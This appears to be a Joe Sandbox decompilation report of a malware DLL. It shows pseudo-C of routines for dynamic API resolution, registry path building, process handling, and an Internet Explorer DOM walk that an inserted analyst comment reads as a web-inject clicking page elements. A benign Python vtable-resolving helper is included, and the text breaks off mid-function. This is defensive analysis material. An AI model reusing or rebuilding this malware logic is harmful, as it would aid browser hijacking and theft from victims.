                                0x00d44a27

                                APIs
                                  • Part of subcall function 00D41525: RtlAllocateHeap.NTDLL(00000000,00000000,00D41278), ref: 00D41531
                                • GetModuleHandleA.KERNEL32(4C44544E,00000020,?,74183966,00000000,?,?,?,00D434A1,?,00000001,?,?,00000000,00000000), ref: 00D44969
                                • GetProcAddress.KERNEL32(00000000,7243775A), ref: 00D4498B
                                • GetProcAddress.KERNEL32(00000000,614D775A), ref: 00D449A1
                                • GetProcAddress.KERNEL32(00000000,6E55775A), ref: 00D449B7
                                • GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 00D449CD
                                • GetProcAddress.KERNEL32(00000000,6C43775A), ref: 00D449E3
                                  • Part of subcall function 00D45CD1: memset.NTDLL ref: 00D45D50
                                Memory Dump Source
                                • Source File: 00000000.00000002.796535569.0000000000D41000.00000020.00020000.sdmp, Offset: 00D40000, based on PE: true
                                • Associated: 00000000.00000002.796511171.0000000000D40000.00000004.00020000.sdmp
                                • Associated: 00000000.00000002.796588201.0000000000D4C000.00000002.00020000.sdmp
                                • Associated: 00000000.00000002.796607037.0000000000D4D000.00000004.00020000.sdmp
                                • Associated: 00000000.00000002.796628462.0000000000D4F000.00000002.00020000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d40000_loaddll32.jbxd
                                Similarity
                                • API ID: AddressProc$AllocateHandleHeapModulememset
                                • String ID:
                                • API String ID: 1886625739-0
                                • Opcode ID: a8723f899ba5a06790d04751bb918e3bc5321c57771f7d7fe86d606c986e0122
                                • Instruction ID: 9f8f1eb1cb332cc3657fb13d2c438f48294f0ba700667f995ecd6d0f70ec2627
                                • Opcode Fuzzy Hash: a8723f899ba5a06790d04751bb918e3bc5321c57771f7d7fe86d606c986e0122
                                • Instruction Fuzzy Hash: B92157B564070ABFD710EF69DC89E6AB7ECEF083087040466E905D7322EB70E9448B74
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 88%
                                			E00D44B2A(void* __ecx, char* _a8, char _a16, intOrPtr* _a20, char _a24) {
                                				signed int _v8;
                                				char _v12;
                                				signed int* _v16;
                                				char _v284;
                                				void* __esi;
                                				char* _t59;
                                				intOrPtr* _t60;
                                				intOrPtr _t64;
                                				char _t65;
                                				intOrPtr _t68;
                                				intOrPtr _t69;
                                				intOrPtr _t71;
                                				void* _t73;
                                				signed int _t81;
                                				void* _t91;
                                				void* _t92;
                                				char _t98;
                                				signed int* _t100;
                                				intOrPtr* _t101;
                                				void* _t102;
                                
                                				_t92 = __ecx;
                                				_v8 = _v8 & 0x00000000;
                                				_t98 = _a16;
                                				if(_t98 == 0) {
                                					__imp__( &_v284,  *0xd4d33c);
                                					_t91 = 0x80000002;
                                					L6:
                                					_t59 = E00D47B3B( &_v284,  &_v284);
                                					_a8 = _t59;
                                					if(_t59 == 0) {
                                						_v8 = 8;
                                						L29:
                                						_t60 = _a20;
                                						if(_t60 != 0) {
                                							 *_t60 =  *_t60 + 1;
                                						}
                                						return _v8;
                                					}
                                					_t101 = _a24;
                                					if(E00D48C52(_t92, _t97, _t101, _t91, _t59) != 0) {
                                						L27:
                                						E00D48B22(_a8);
                                						goto L29;
                                					}
                                					_t64 =  *0xd4d278; // 0x3289d18
                                					_t16 = _t64 + 0xc; // 0x3289e3a
                                					_t65 = E00D47B3B(_t64,  *_t16);
                                					_a24 = _t65;
                                					if(_t65 == 0) {
                                						L14:
                                						_t29 = _t101 + 0x14; // 0x102
                                						_t33 = _t101 + 0x10; // 0x3d00d4c0
                                						if(E00D4A38F(_t97,  *_t33, _t91, _a8,  *0xd4d334,  *((intOrPtr*)( *_t29 + 0x28)),  *((intOrPtr*)( *_t29 + 0x2c))) == 0) {
                                							_t68 =  *0xd4d2a8; // 0x253a5a8
                                							if(_t98 == 0) {
                                								_t35 = _t68 + 0xd4ea3f; // 0x4d4c4b48
                                								_t69 = _t35;
                                							} else {
                                								_t34 = _t68 + 0xd4e8e7; // 0x55434b48
                                								_t69 = _t34;
                                							}
                                							if(E00D48F85(_t69,  *0xd4d334,  *0xd4d338,  &_a24,  &_a16) == 0) {
                                								if(_t98 == 0) {
                                									_t71 =  *0xd4d2a8; // 0x253a5a8
                                									_t44 = _t71 + 0xd4e846; // 0x74666f53
                                									_t73 = E00D47B3B(_t44, _t44);
                                									_t99 = _t73;
                                									if(_t73 == 0) {
                                										_v8 = 8;
                                									} else {
                                										_t47 = _t101 + 0x10; // 0x3d00d4c0
                                										E00D44538( *_t47, _t91, _a8,  *0xd4d338, _a24);
                                										_t49 = _t101 + 0x10; // 0x3d00d4c0
                                										E00D44538( *_t49, _t91, _t99,  *0xd4d330, _a16);
                                										E00D48B22(_t99);
                                									}
                                								} else {
                                									_t40 = _t101 + 0x10; // 0x3d00d4c0
                                									E00D44538( *_t40, _t91, _a8,  *0xd4d338, _a24);
                                									_t43 = _t101 + 0x10; // 0x3d00d4c0
                                									E00D44538( *_t43, _t91, _a8,  *0xd4d330, _a16);
                                								}
                                								if( *_t101 != 0) {
                                									E00D48B22(_a24);
                                								} else {
                                									 *_t101 = _a16;
                                								}
                                							}
                                						}
                                						goto L27;
                                					}
                                					_t21 = _t101 + 0x10; // 0x3d00d4c0
                                					_t81 = E00D47DDD( *_t21, _t91, _a8, _t65,  &_v16,  &_v12);
                                					if(_t81 == 0) {
                                						_t100 = _v16;
                                						if(_v12 == 0x28) {
                                							 *_t100 =  *_t100 & _t81;
                                							_t26 = _t101 + 0x10; // 0x3d00d4c0
                                							E00D4A38F(_t97,  *_t26, _t91, _a8, _a24, _t100, 0x28);
                                						}
                                						E00D48B22(_t100);
                                						_t98 = _a16;
                                					}
                                					E00D48B22(_a24);
                                					goto L14;
                                				}
                                				if(_t98 <= 8 || _t98 + 0x2a >= 0x104 || StrChrA(_a8, 0x5f) != 0) {
                                					goto L29;
                                				} else {
                                					_t97 = _a8;
                                					E00D4A789(_t98, _a8,  &_v284);
                                					__imp__(_t102 + _t98 - 0x117,  *0xd4d33c);
                                					 *((char*)(_t102 + _t98 - 0x118)) = 0x5c;
                                					_t91 = 0x80000003;
                                					goto L6;
                                				}
                                			}

                                0x00d44b2a
                                0x00d44b33
                                0x00d44b3a
                                0x00d44b3f
                                0x00d44bac
                                0x00d44bb2
                                0x00d44bb7
                                0x00d44bbe
                                0x00d44bc3
                                0x00d44bc8
                                0x00d44d33
                                0x00d44d3a
                                0x00d44d3a
                                0x00d44d3f
                                0x00d44d41
                                0x00d44d41
                                0x00d44d4a
                                0x00d44d4a
                                0x00d44bce
                                0x00d44bda
                                0x00d44d29
                                0x00d44d2c
                                0x00000000
                                0x00d44d2c
                                0x00d44be0
                                0x00d44be5
                                0x00d44be8
                                0x00d44bed
                                0x00d44bf2
                                0x00d44c3b
                                0x00d44c3b
                                0x00d44c4e
                                0x00d44c58
                                0x00d44c5e
                                0x00d44c65
                                0x00d44c6f
                                0x00d44c6f
                                0x00d44c67
                                0x00d44c67
                                0x00d44c67
                                0x00d44c67
                                0x00d44c91
                                0x00d44c99
                                0x00d44cc7
                                0x00d44ccc
                                0x00d44cd3
                                0x00d44cd8
                                0x00d44cdc
                                0x00d44d0e
                                0x00d44cde
                                0x00d44ceb
                                0x00d44cee
                                0x00d44cfe
                                0x00d44d01
                                0x00d44d07
                                0x00d44d07
                                0x00d44c9b
                                0x00d44ca8
                                0x00d44cab
                                0x00d44cbd
                                0x00d44cc0
                                0x00d44cc0
                                0x00d44d18
                                0x00d44d24
                                0x00d44d1a
                                0x00d44d1d
                                0x00d44d1d
                                0x00d44d18
                                0x00d44c91
                                0x00000000
                                0x00d44c58
                                0x00d44c01
                                0x00d44c04
                                0x00d44c0b
                                0x00d44c11
                                0x00d44c14
                                0x00d44c16
                                0x00d44c22
                                0x00d44c25
                                0x00d44c25
                                0x00d44c2b
                                0x00d44c30
                                0x00d44c30
                                0x00d44c36
                                0x00000000
                                0x00d44c36
                                0x00d44b44
                                0x00000000
                                0x00d44b6b
                                0x00d44b6b
                                0x00d44b77
                                0x00d44b8a
                                0x00d44b90
                                0x00d44b98
                                0x00000000
                                0x00d44b98

                                APIs
                                • StrChrA.SHLWAPI(00D49900,0000005F,00000000,00000000,00000104), ref: 00D44B5D
                                • lstrcpy.KERNEL32(?,?), ref: 00D44B8A
                                  • Part of subcall function 00D47B3B: lstrlen.KERNEL32(?,00000000,03289D18,00000000,00D45142,03289F3B,?,?,?,?,?,69B25F44,00000005,00D4D00C), ref: 00D47B42
                                  • Part of subcall function 00D47B3B: mbstowcs.NTDLL ref: 00D47B6B
                                  • Part of subcall function 00D47B3B: memset.NTDLL ref: 00D47B7D
                                  • Part of subcall function 00D44538: lstrlenW.KERNEL32(?,?,?,00D44CF3,3D00D4C0,80000002,00D49900,00D45C8D,74666F53,4D4C4B48,00D45C8D,?,3D00D4C0,80000002,00D49900,?), ref: 00D4455D
                                  • Part of subcall function 00D48B22: RtlFreeHeap.NTDLL(00000000,00000000,00D4131A,00000000,?,?,00000000), ref: 00D48B2E
                                • lstrcpy.KERNEL32(?,00000000), ref: 00D44BAC
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.796535569.0000000000D41000.00000020.00020000.sdmp, Offset: 00D40000, based on PE: true
                                • Associated: 00000000.00000002.796511171.0000000000D40000.00000004.00020000.sdmp
                                • Associated: 00000000.00000002.796588201.0000000000D4C000.00000002.00020000.sdmp
                                • Associated: 00000000.00000002.796607037.0000000000D4D000.00000004.00020000.sdmp
                                • Associated: 00000000.00000002.796628462.0000000000D4F000.00000002.00020000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d40000_loaddll32.jbxd
                                Similarity
                                • API ID: lstrcpylstrlen$FreeHeapmbstowcsmemset
                                • String ID: ($\
                                • API String ID: 3924217599-1512714803
                                • Opcode ID: f291ea69175df2ef490caca9a69d57ab25486ca40121a13104c6688ed79fa5a5
                                • Instruction ID: b6052a13d68ad10405d61d816d8f772e8155218896cbec273edaf6467edef825
                                • Opcode Fuzzy Hash: f291ea69175df2ef490caca9a69d57ab25486ca40121a13104c6688ed79fa5a5
                                • Instruction Fuzzy Hash: E3516C7550020AFFDF21AFA0DD84EAA7BBAFF08300F148554F95196261DB31D9A5AB31
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 37%
                                			E00D49FF6() {
                                				void* _v0;
                                				void** _t3;
                                				void** _t5;
                                				void** _t7;
                                				void** _t8;
                                				void* _t10;
                                
                                				_t3 =  *0xd4d32c; // 0x32895b0
                                				__imp__( &(_t3[0x10]));
                                				while(1) {
                                					_t5 =  *0xd4d32c; // 0x32895b0
                                					_t1 =  &(_t5[0x16]); // 0x0
                                					if( *_t1 == 0) {
                                						break;
                                					}
                                					Sleep(0xa);
                                				}
                                				_t7 =  *0xd4d32c; // 0x32895b0
                                				_t10 =  *_t7;
                                				if(_t10 != 0 && _t10 != 0xd4e81a) {
                                					HeapFree( *0xd4d238, 0, _t10);
                                					_t7 =  *0xd4d32c; // 0x32895b0
                                				}
                                				 *_t7 = _v0;
                                				_t8 =  &(_t7[0x10]);
                                				__imp__(_t8);
                                				return _t8;
                                			}

                                0x00d49ff6
                                0x00d49fff
                                0x00d4a00f
                                0x00d4a00f
                                0x00d4a014
                                0x00d4a019
                                0x00000000
                                0x00000000
                                0x00d4a009
                                0x00d4a009
                                0x00d4a01b
                                0x00d4a020
                                0x00d4a024
                                0x00d4a037
                                0x00d4a03d
                                0x00d4a03d
                                0x00d4a046
                                0x00d4a048
                                0x00d4a04c
                                0x00d4a052

                                APIs
                                • RtlEnterCriticalSection.NTDLL(03289570), ref: 00D49FFF
                                • Sleep.KERNEL32(0000000A,?,00D430F3), ref: 00D4A009
                                • HeapFree.KERNEL32(00000000,?,?,00D430F3), ref: 00D4A037
                                • RtlLeaveCriticalSection.NTDLL(03289570), ref: 00D4A04C
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.796535569.0000000000D41000.00000020.00020000.sdmp, Offset: 00D40000, based on PE: true
                                • Associated: 00000000.00000002.796511171.0000000000D40000.00000004.00020000.sdmp
                                • Associated: 00000000.00000002.796588201.0000000000D4C000.00000002.00020000.sdmp
                                • Associated: 00000000.00000002.796607037.0000000000D4D000.00000004.00020000.sdmp
                                • Associated: 00000000.00000002.796628462.0000000000D4F000.00000002.00020000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d40000_loaddll32.jbxd
                                Similarity
                                • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                                • String ID: Ut
                                • API String ID: 58946197-8415677
                                • Opcode ID: 7baeea32a4b907d9de5f14455bbd82a39cdfed8c8b07a691cb8f6d3383e7f87c
                                • Instruction ID: 94c705f0c744e4160e1c1b3ee5d081b28f586a4a1424a9651ee7bdfb88928394
                                • Opcode Fuzzy Hash: 7baeea32a4b907d9de5f14455bbd82a39cdfed8c8b07a691cb8f6d3383e7f87c
                                • Instruction Fuzzy Hash: E4F0D47C641301DBE7288F68EC89F2577E6AB0A741B089018E902DB378C634EC00DA36
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 100%
                                			E00D49EBB(intOrPtr _a4) {
                                				void* _t2;
                                				unsigned int _t4;
                                				void* _t5;
                                				long _t6;
                                				void* _t7;
                                				void* _t15;
                                
                                				_t2 = CreateEventA(0, 1, 0, 0);
                                				 *0xd4d26c = _t2;
                                				if(_t2 == 0) {
                                					return GetLastError();
                                				}
                                				_t4 = GetVersion();
                                				if(_t4 != 5) {
                                					L4:
                                					if(_t15 <= 0) {
                                						_t5 = 0x32;
                                						return _t5;
                                					}
                                					L5:
                                					 *0xd4d25c = _t4;
                                					_t6 = GetCurrentProcessId();
                                					 *0xd4d258 = _t6;
                                					 *0xd4d264 = _a4;
                                					_t7 = OpenProcess(0x10047a, 0, _t6);
                                					 *0xd4d254 = _t7;
                                					if(_t7 == 0) {
                                						 *0xd4d254 =  *0xd4d254 | 0xffffffff;
                                					}
                                					return 0;
                                				}
                                				if(_t4 >> 8 > 0) {
                                					goto L5;
                                				}
                                				_t15 = _t4 - _t4;
                                				goto L4;
                                			}

                                0x00d49ec3
                                0x00d49ec9
                                0x00d49ed0
                                0x00000000
                                0x00d49f2a
                                0x00d49ed2
                                0x00d49eda
                                0x00d49ee7
                                0x00d49ee7
                                0x00d49f27
                                0x00000000
                                0x00d49f27
                                0x00d49ee9
                                0x00d49ee9
                                0x00d49eee
                                0x00d49f00
                                0x00d49f05
                                0x00d49f0b
                                0x00d49f11
                                0x00d49f18
                                0x00d49f1a
                                0x00d49f1a
                                0x00000000
                                0x00d49f21
                                0x00d49ee3
                                0x00000000
                                0x00000000
                                0x00d49ee5
                                0x00000000

                                APIs
                                • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00D427C3,?,?,00000001,?,?,?,00D47F25,?), ref: 00D49EC3
                                • GetVersion.KERNEL32(?,00000001,?,?,?,00D47F25,?), ref: 00D49ED2
                                • GetCurrentProcessId.KERNEL32(?,00000001,?,?,?,00D47F25,?), ref: 00D49EEE
                                • OpenProcess.KERNEL32(0010047A,00000000,00000000,?,00000001,?,?,?,00D47F25,?), ref: 00D49F0B
                                • GetLastError.KERNEL32(?,00000001,?,?,?,00D47F25,?), ref: 00D49F2A
                                Memory Dump Source
                                • Source File: 00000000.00000002.796535569.0000000000D41000.00000020.00020000.sdmp, Offset: 00D40000, based on PE: true
                                • Associated: 00000000.00000002.796511171.0000000000D40000.00000004.00020000.sdmp
                                • Associated: 00000000.00000002.796588201.0000000000D4C000.00000002.00020000.sdmp
                                • Associated: 00000000.00000002.796607037.0000000000D4D000.00000004.00020000.sdmp
                                • Associated: 00000000.00000002.796628462.0000000000D4F000.00000002.00020000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d40000_loaddll32.jbxd
                                Similarity
                                • API ID: Process$CreateCurrentErrorEventLastOpenVersion
                                • String ID:
                                • API String ID: 2270775618-0
                                • Opcode ID: 6b26320e4ab751bd486800b66579e597f31539679f13ace6ec7a61d8eca8135e
                                • Instruction ID: 7a1d0402df681c1ea92cfe1f905111eb295316a5a68b5474aad864ae93bc5621
                                • Opcode Fuzzy Hash: 6b26320e4ab751bd486800b66579e597f31539679f13ace6ec7a61d8eca8135e
                                • Instruction Fuzzy Hash: 25F0F678662302DBD720CF75AC79B16BBA2AB82705F14051AFA42C63E0E7B1C405CB3D
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 46%
                                			E00D44E05(intOrPtr* __eax) {
                                				void* _v8;
                                				WCHAR* _v12;
                                				void* _v16;
                                				char _v20;
                                				void* _v24;
                                				intOrPtr _v28;
                                				void* _v32;
                                				intOrPtr _v40;
                                				short _v48;
                                				intOrPtr _v56;
                                				short _v64;
                                				intOrPtr* _t54;
                                				intOrPtr* _t56;
                                				intOrPtr _t57;
                                				intOrPtr* _t58;
                                				intOrPtr* _t60;
                                				void* _t61;
                                				intOrPtr* _t63;
                                				intOrPtr* _t65;
                                				short _t67;
                                				intOrPtr* _t68;
                                				intOrPtr* _t70;
                                				intOrPtr* _t72;
                                				intOrPtr* _t75;
                                				intOrPtr* _t77;
                                				intOrPtr _t79;
                                				intOrPtr* _t83;
                                				intOrPtr* _t87;
                                				intOrPtr _t103;
                                				intOrPtr _t109;
                                				void* _t118;
                                				void* _t122;
                                				void* _t123;
                                				intOrPtr _t130;
                                
                                				_t123 = _t122 - 0x3c;
                                				_push( &_v8);
                                				_push(__eax);
                                				_t118 =  *((intOrPtr*)( *__eax + 0x48))();
                                				if(_t118 >= 0) {
                                					_t54 = _v8;
                                					_t103 =  *0xd4d2a8; // 0x253a5a8
                                					_t5 = _t103 + 0xd4e038; // 0x3050f485
                                					_t118 =  *((intOrPtr*)( *_t54))(_t54, _t5,  &_v32);
                                					_t56 = _v8;
                                					_t57 =  *((intOrPtr*)( *_t56 + 8))(_t56);
                                					if(_t118 >= 0) {
                                						__imp__#2(0xd4c290);
                                						_v28 = _t57;
                                						if(_t57 == 0) {
                                							_t118 = 0x8007000e;
                                						} else {
                                							_t60 = _v32;
                                							_t61 =  *((intOrPtr*)( *_t60 + 0xbc))(_t60, _v28,  &_v24);
                                							_t87 = __imp__#6;
                                							_t118 = _t61;
                                							if(_t118 >= 0) {
                                								_t63 = _v24;
                                								_t118 =  *((intOrPtr*)( *_t63 + 0x24))(_t63,  &_v20);
                                								if(_t118 >= 0) {
                                									_t130 = _v20;
                                									if(_t130 != 0) {
                                										_t67 = 3;
                                										_v64 = _t67;
                                										_v48 = _t67;
                                										_v56 = 0;
                                										_v40 = 0;
                                										if(_t130 > 0) {
                                											while(1) {
                                												_t68 = _v24;
                                												asm("movsd");
                                												asm("movsd");
                                												asm("movsd");
                                												asm("movsd");
                                												_t123 = _t123;
                                												asm("movsd");
                                												asm("movsd");
                                												asm("movsd");
                                												asm("movsd");
                                												_t118 =  *((intOrPtr*)( *_t68 + 0x2c))(_t68,  &_v8);
                                												if(_t118 < 0) {
                                													goto L16;
                                												}
                                												_t70 = _v8;
                                												_t109 =  *0xd4d2a8; // 0x253a5a8
                                												_t28 = _t109 + 0xd4e0bc; // 0x3050f1ff
                                												_t118 =  *((intOrPtr*)( *_t70))(_t70, _t28,  &_v16);
                                												if(_t118 >= 0) {
                                													_t75 = _v16;
                                													_t118 =  *((intOrPtr*)( *_t75 + 0x34))(_t75,  &_v12);
                                													if(_t118 >= 0 && _v12 != 0) {
                                														_t79 =  *0xd4d2a8; // 0x253a5a8
                                														_t33 = _t79 + 0xd4e078; // 0x76006f
                                														if(lstrcmpW(_v12, _t33) == 0) {
                                															_t83 = _v16;
                                															 *((intOrPtr*)( *_t83 + 0x114))(_t83);
                                														}
                                														 *_t87(_v12);
                                													}
                                													_t77 = _v16;
                                													 *((intOrPtr*)( *_t77 + 8))(_t77);
                                												}
                                												_t72 = _v8;
                                												 *((intOrPtr*)( *_t72 + 8))(_t72);
                                												_v40 = _v40 + 1;
                                												if(_v40 < _v20) {
                                													continue;
                                												}
                                												goto L16;
                                											}
                                										}
                                									}
                                								}
                                								L16:
                                								_t65 = _v24;
                                								 *((intOrPtr*)( *_t65 + 8))(_t65);
                                							}
                                							 *_t87(_v28);
                                						}
                                						_t58 = _v32;
                                						 *((intOrPtr*)( *_t58 + 8))(_t58);
                                					}
                                				}
                                				return _t118;
                                			}

                                (Instruction-address column for the function above, one address per decompiled line from 0x00d44e0a to 0x00d44f96, omitted; the call-site addresses survive in the APIs list below.)

                                APIs
                                • SysAllocString.OLEAUT32(00D4C290), ref: 00D44E55
                                • lstrcmpW.KERNEL32(00000000,0076006F), ref: 00D44F36
                                • SysFreeString.OLEAUT32(00000000), ref: 00D44F4F
                                • SysFreeString.OLEAUT32(?), ref: 00D44F7E
                                Memory Dump Source
                                • Source File: 00000000.00000002.796535569.0000000000D41000.00000020.00020000.sdmp, Offset: 00D40000, based on PE: true
                                • Associated: 00000000.00000002.796511171.0000000000D40000.00000004.00020000.sdmp
                                • Associated: 00000000.00000002.796588201.0000000000D4C000.00000002.00020000.sdmp
                                • Associated: 00000000.00000002.796607037.0000000000D4D000.00000004.00020000.sdmp
                                • Associated: 00000000.00000002.796628462.0000000000D4F000.00000002.00020000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d40000_loaddll32.jbxd
                                Similarity
                                • API ID: String$Free$Alloclstrcmp
                                • String ID:
                                • API String ID: 1885612795-0
                                • Opcode ID: 5e66d762be028d131f707df8891d60b1302a7b59dfbfb1034a9339ce83155537
                                • Instruction ID: 5d71aa805b440ed3cce8eb5ccab79d9a8d7fb641ac4bbc2bd43016ce40be0c1a
                                • Opcode Fuzzy Hash: 5e66d762be028d131f707df8891d60b1302a7b59dfbfb1034a9339ce83155537
                                • Instruction Fuzzy Hash: E7511975D00619EFCB00DFA8C8889AEF7BAEF89704B148594E915EB324D771AD45CBB0
                                Uniqueness

                                Uniqueness Score: -1.00%
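The function above reaches every COM method through a raw vtable slot (`*__eax + 0x48`, `+ 0xbc`, `+ 0x24`, `+ 0x2c`, `+ 0x34`, `+ 0x114`, and `+ 8` for Release) because no type information survives decompilation. The page does give two anchors: the decompiler's annotations on the IIDs passed to QueryInterface, 0x3050f485 at `_t103 + 0xd4e038` and 0x3050f1ff at `_t109 + 0xd4e0bc`, are the Data1 fields of IID_IHTMLDocument3 and IID_IHTMLElement, and the OLEAUT32 ordinals `__imp__#2` / `__imp__#6` are SysAllocString / SysFreeString (matching the APIs list). The argument shapes fix the rest: slot 47 of the document takes the BSTR from SysAllocString plus an out-pointer, slot 9 of the result returns the count that bounds the loop, slot 11 takes the two 16-byte VT_I4 VARIANTs (vt = 3, `_v64`/`_v48`) the code builds on the stack and copies with eight `movsd`, slot 13 of the element returns a BSTR that is compared with lstrcmpW against a decrypted string beginning with the UTF-16 characters 'o','v' (0x76006f) and then freed, and slot 69 takes no arguments. That is IHTMLDocument3::getElementsByTagName, IHTMLElementCollection::get_length / ::item and IHTMLElement::get_id / ::click: the routine finds page elements by tag name, checks each id, and clicks the match, which is browser-automation behaviour for a web-inject. The Python script below is an added example, not part of this report or of the sample: it embeds the method order declared for these interfaces in the SDK headers (exdisp.h, mshtml.h) and resolves the call sites. The one assumption in it is that the first object, whose slot 18 is called with a single out-pointer, is an IWebBrowser2 (slot 18 = get_Document); the decompiler does not show that IID.

```python
"""Resolve COM vtable slot offsets from decompiled call sites to method names.

Added example for analysing the function above; the tables follow the method
order declared in exdisp.h / mshtml.h.  Which interface sits behind each
pointer is the analyst's inference (see the lead-in), not decompiler output."""

IUNKNOWN = ["QueryInterface", "AddRef", "Release"]
IDISPATCH = IUNKNOWN + ["GetTypeInfoCount", "GetTypeInfo", "GetIDsOfNames", "Invoke"]

# IWebBrowser2 derives from IWebBrowserApp, which derives from IWebBrowser; the
# slot used by the sample (18) lies inside the IWebBrowser part, listed here.
IWEBBROWSER = IDISPATCH + [
    "GoBack", "GoForward", "GoHome", "GoSearch", "Navigate", "Refresh", "Refresh2",
    "Stop", "get_Application", "get_Parent", "get_Container", "get_Document",
    "get_TopLevelContainer", "get_Type", "get_Left", "put_Left", "get_Top", "put_Top",
    "get_Width", "put_Width", "get_Height", "put_Height", "get_LocationName",
    "get_LocationURL", "get_Busy",
]
IHTMLDOCUMENT3 = IDISPATCH + [
    "releaseCapture", "recalc", "createTextNode", "get_documentElement", "get_uniqueID",
    "attachEvent", "detachEvent", "put_onrowsdelete", "get_onrowsdelete",
    "put_onrowsinserted", "get_onrowsinserted", "put_oncellchange", "get_oncellchange",
    "put_ondatasetchanged", "get_ondatasetchanged", "put_ondataavailable",
    "get_ondataavailable", "put_ondatasetcomplete", "get_ondatasetcomplete",
    "put_onpropertychange", "get_onpropertychange", "put_dir", "get_dir",
    "put_oncontextmenu", "get_oncontextmenu", "put_onstop", "get_onstop",
    "createDocumentFragment", "get_parentDocument", "put_enableDownload",
    "get_enableDownload", "put_baseUrl", "get_baseUrl", "get_childNodes",
    "put_inheritStyleSheets", "get_inheritStyleSheets", "put_onbeforeeditfocus",
    "get_onbeforeeditfocus", "getElementsByName", "getElementById", "getElementsByTagName",
]
IHTMLELEMENTCOLLECTION = IDISPATCH + [
    "toString", "put_length", "get_length", "get__newEnum", "item", "tags",
]
IHTMLELEMENT = IDISPATCH + [
    "setAttribute", "getAttribute", "removeAttribute", "put_className", "get_className",
    "put_id", "get_id", "get_tagName", "get_parentElement", "get_style",
] + [prefix + event                       # put_/get_ pairs for the 11 event handlers
     for event in ("onhelp", "onclick", "ondblclick", "onkeydown", "onkeyup",
                   "onkeypress", "onmouseout", "onmouseover", "onmousemove",
                   "onmousedown", "onmouseup")
     for prefix in ("put_", "get_")] + [
    "get_document", "put_title", "get_title", "put_language", "get_language",
    "put_onselectstart", "get_onselectstart", "scrollIntoView", "contains",
    "get_sourceIndex", "get_recordNumber", "put_lang", "get_lang", "get_offsetLeft",
    "get_offsetTop", "get_offsetWidth", "get_offsetHeight", "get_offsetParent",
    "put_innerHTML", "get_innerHTML", "put_innerText", "get_innerText",
    "put_outerHTML", "get_outerHTML", "put_outerText", "get_outerText",
    "insertAdjacentHTML", "insertAdjacentText", "get_parentTextEdit", "get_isTextEdit",
    "click", "get_filters",
]

PTR = 4  # 32-bit sample: one vtable slot per 4 bytes


def resolve(vtable, offset):
    """Map a byte offset into a vtable to (slot index, method name)."""
    if offset % PTR:
        raise ValueError(f"offset {offset:#x} is not slot aligned")
    slot = offset // PTR
    if slot >= len(vtable):
        raise ValueError(f"slot {slot} is past the end of this interface")
    return slot, vtable[slot]


# Call sites copied from the decompiled function, in execution order.
# The interface column is the analyst's assignment (IWebBrowser2 is assumed).
CALL_SITES = [
    ("IWebBrowser2", IWEBBROWSER, 0x48),
    ("IHTMLDocument3", IHTMLDOCUMENT3, 0xbc),
    ("IHTMLElementCollection", IHTMLELEMENTCOLLECTION, 0x24),
    ("IHTMLElementCollection", IHTMLELEMENTCOLLECTION, 0x2c),
    ("IHTMLElement", IHTMLELEMENT, 0x34),
    ("IHTMLElement", IHTMLELEMENT, 0x114),
    ("IHTMLElement", IHTMLELEMENT, 0x8),
]


def annotate(sites=CALL_SITES):
    """Return 'Interface::method' strings for each decompiled vtable call."""
    return [f"{name}::{resolve(vt, off)[1]}" for name, vt, off in sites]


if __name__ == "__main__":
    for line in annotate():
        print(line)
```

Running it prints the call sequence in the order the decompiled code executes it; a slot past the end of a table raises, which is the quickest way to notice that a pointer is not the interface assumed for it. For a 64-bit build of the same code set PTR to 8.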

                                APIs
                                • SysAllocString.OLEAUT32(?), ref: 00D413B6
                                • SysFreeString.OLEAUT32(00000000), ref: 00D4149B
                                  • Part of subcall function 00D44E05: SysAllocString.OLEAUT32(00D4C290), ref: 00D44E55
                                • SafeArrayDestroy.OLEAUT32(00000000), ref: 00D414EE
                                • SysFreeString.OLEAUT32(00000000), ref: 00D414FD
                                  • Part of subcall function 00D452B9: Sleep.KERNEL32(000001F4), ref: 00D45301
                                Memory Dump Source
                                • Source File: 00000000.00000002.796535569.0000000000D41000.00000020.00020000.sdmp, Offset: 00D40000, based on PE: true
                                • Associated: 00000000.00000002.796511171.0000000000D40000.00000004.00020000.sdmp
                                • Associated: 00000000.00000002.796588201.0000000000D4C000.00000002.00020000.sdmp
                                • Associated: 00000000.00000002.796607037.0000000000D4D000.00000004.00020000.sdmp
                                • Associated: 00000000.00000002.796628462.0000000000D4F000.00000002.00020000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d40000_loaddll32.jbxd
                                Similarity
                                • API ID: String$AllocFree$ArrayDestroySafeSleep
                                • String ID:
                                • API String ID: 3193056040-0
                                • Opcode ID: 1673420d248cb07fc7c15170e43edf8cfa7fc6bc2a8ddd5fd6833b4a1ab9154a
                                • Instruction ID: 390e2c3647fa77607e60d34f589ffe4cb974c53f46f68f1b77787663f11298ec
                                • Opcode Fuzzy Hash: 1673420d248cb07fc7c15170e43edf8cfa7fc6bc2a8ddd5fd6833b4a1ab9154a
                                • Instruction Fuzzy Hash: BD515039900609EFDB11CFA8D844A9EB7B6FF88710B148869E919DB360DB71ED45CB70
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 85%
                                			E00D429ED(signed int __eax, void* __eflags, intOrPtr _a4, signed int _a8, signed int _a12, intOrPtr _a16) {
                                				intOrPtr _v8;
                                				intOrPtr _v12;
                                				signed int _v16;
                                				void _v92;
                                				void _v236;
                                				void* _t55;
                                				unsigned int _t56;
                                				signed int _t66;
                                				signed int _t74;
                                				void* _t76;
                                				signed int _t79;
                                				void* _t81;
                                				void* _t92;
                                				void* _t96;
                                				signed int* _t99;
